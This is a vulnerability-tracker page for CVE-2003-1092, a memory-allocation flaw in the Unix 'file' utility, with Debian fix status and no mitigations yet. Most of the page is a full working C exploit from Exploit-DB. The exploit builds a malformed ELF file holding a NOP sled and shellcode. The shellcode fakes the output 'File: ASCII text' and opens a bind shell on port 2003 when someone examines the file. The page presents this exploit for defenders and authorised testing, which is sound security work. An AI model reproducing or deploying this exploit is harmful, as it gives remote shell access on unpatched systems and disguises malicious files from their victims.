CVE-2003-1092

unknown

Published — · Modified —

💬 Discuss on Community ✚ Propose mitigation

CVSS v3

—

CVSS v4 NEW

—

not yet in upstream

VIR risk

1.0

Description

Unknown vulnerability in the "Automatic File Content Type Recognition (AFCTR) Tool version of the file package before 3.41, related to "a memory allocation problem," has unknown impact.

Predictions

Exploit likelihood

55%

Patch ETA

—

Heuristic predictions, AS-IS, for prioritization only.

Mitigations

No mitigations published for this CVE yet.

The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or — if you've already worked around this in production — publish your fix to the community-verified tier.

✚ Propose a mitigation on Community → Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here with source_tier=community-verified.

Exploits

Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.

Exploit-DB

EDB-22326 local linux verified text · 4 KB

CrZ · 2003-03-06

File 3.x - Utility Local Memory Allocation

text exploit Source: Exploit-DB

// source: https://www.securityfocus.com/bid/7009/info

It has been reported that a memory allocation issue exists the file program. Although details of this issue are currently unavailable, it is likely that this issue could be exploited to cause a denial of service condition, and potentially execute code as the user of the file utility. 

/*
\   __________________
/   Black Sand Project
\   __________________
/
\   Created by CrZ [crazy_einstein@yahoo.com] LimpidByte [lbyte.void.ru] /06.03.2003/
/
\   Bug discovered by iDEFENCE: http://www.idefense.com/advisory/03.04.03.txt
/   
\   program name: DEADELF
/
\   description: Exploit for file program <= 3.39
/
\   info: program create file-exploit and when you 
/   make "file /path/to/this/file-exploit" shell
\   will open on 2003 port.
/
\   Usage: ./85deadelf <file-exploit> [return address]
/
\   Example of work:
/
\	[crz@blacksand crz]$ gcc -o 85deadelf 85deadelf.c
/	[crz@blacksand crz]$ ./85deadelf deadelf
\	[+] Creating a evil file deadelf!
/	[+] Using address of shellcode = 0xbfffbd40
\	[crz@blacksand crz]$ file deadelf
/	File: ASCII text
\	[crz@blacksand crz]$ telnet localhost 2003
/	Trying 127.0.0.1...
\	Connected to blacksand (127.0.0.1).
/	Escape character is '^]'.
\	id;
/	uid=500(crz) gid=500(crz) groups=500(crz)
\	: command not found
/	exit;
\	Connection closed by foreign host.
/	[crz@blacksand crz]$
\
/   Tested against: file-3.37 (RedHat8.0)
\		    file-3.38 (RedHat8.0)
*/


#include <fcntl.h>
#include <elf.h>
#include <stdio.h>


void usage(char *prog) {

	printf("\nCreated by CrZ [crazy_einstein@yahoo.com] Limpid Byte [lbyte.void.ru]\n");
	printf("Usage: %s <name of evil file> [return address]\n\n",prog);
	exit(0);
}

int main(int argc, char **argv) {
	
/* 
\   a simple shellcode that show fake result of file program & bind
/   shell on 2003 port by CrZ
*/
	
char shellcode[]=
	"\x31\xc0\x31\xdb\x53\xb3\x01\x50" /* write(1,"File: ASCII text");*/
	"\x68\x01\x01\x0a\x0d\x68\x74\x65"
	"\x78\x74\x68\x43\x49\x49\x20\x68"
	"\x3a\x20\x41\x53\x68\x46\x69\x6c"
	"\x65\x89\xe1\xb2\x18\xb0\x04\xcd\x80"
        /* bind shell on 2003 port */
        "\x31\xc0\x89\xc3\xb0\x02\xcd\x80\x38\xc3\x74\x05\x8d\x43\x01\xcd\x80"
        "\x31\xc0\x89\x45\x10\x40\x89\xc3\x89\x45\x0c\x40\x89\x45\x08\x8d\x4d"
        "\x08\xb0\x66\xcd\x80\x89\x45\x08\x43\x66\x89\x5d\x14\x66\xc7\x45\x16"
        "\x07\xd3\x31\xd2\x89\x55\x18\x8d\x55\x14\x89\x55\x0c\xc6\x45\x10\x10"
        "\xb0\x66\xcd\x80\x40\x89\x45\x0c\x43\x43\xb0\x66\xcd\x80\x43\x89\x45"
        "\x0c\x89\x45\x10\xb0\x66\xcd\x80\x89\xc3\x31\xc9\xb0\x3f\xcd\x80\x41"
        "\x80\xf9\x03\x75\xf6\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62"
        "\x69\x89\xe3\x52\x53\x89\xe1\xb0\x0b\xcd\x80";
	
	int fd,i;
	Elf32_Ehdr elfhdr;
	long xret=0xbfffbd40;
	char *evilfile="bl00mps";
	char tmp[100];
	
	if(!argv[1]) usage(argv[0]);
	else evilfile=argv[1];
	if(argv[2]) sscanf(argv[2],"0x%x",&xret);
	
	printf("[+] Creating a evil file %s!\n",evilfile);
	printf("[+] Using address of shellcode = 0x%x\n",xret);	
	
	sprintf(tmp,"echo>%s",evilfile);
	system(tmp);
	fd=open(evilfile,O_WRONLY);

	bzero(&elfhdr,sizeof elfhdr );
	elfhdr.e_type=1; //type should by NOT ET_CORE (4) & NOT ET_EXEC (2)
	sprintf(elfhdr.e_ident,"\x7f\x45\x4c\x46\x01\x01\x01"); //ELF32 FORMAT
	elfhdr.e_machine=1;
	elfhdr.e_version=1;
	elfhdr.e_entry=0;
	elfhdr.e_phoff=0;
	elfhdr.e_shoff=0;
	elfhdr.e_flags=0;
	elfhdr.e_ehsize=0;
	elfhdr.e_phentsize=0xfff; //define size for read()
	elfhdr.e_phnum=1; //this is for stop for() loop when read()
	elfhdr.e_shentsize=0xfff; //define size for read()
	elfhdr.e_shnum=1; //this is for stop for() loop when read()
	elfhdr.e_shstrndx=0;
	write(fd,&elfhdr,sizeof(elfhdr));
	
	for(i=0;i<20;i++) write(fd,&xret,4); //write new return address
	for(i=0;i<6000;i++) write(fd,"\x90",1); //write nops
	write(fd,&shellcode,sizeof shellcode); //write shellcode

	close(fd);

	
	return 0;	
}

OS impact

Debian Fixed 5 releases

Version	Status	Fixed in
trixie	Fixed	`3.4.1`
sid	Fixed	`3.4.1`
forky	Fixed	`3.4.1`
bullseye	Fixed	`3.4.1`
bookworm	Fixed	`3.4.1`

References

https://security-tracker.debian.org/tracker/CVE-2003-1092

Community-verified mitigations for this CVE will appear above when contributors publish them.

Verify integrity in audit chain (admin only). AS-IS.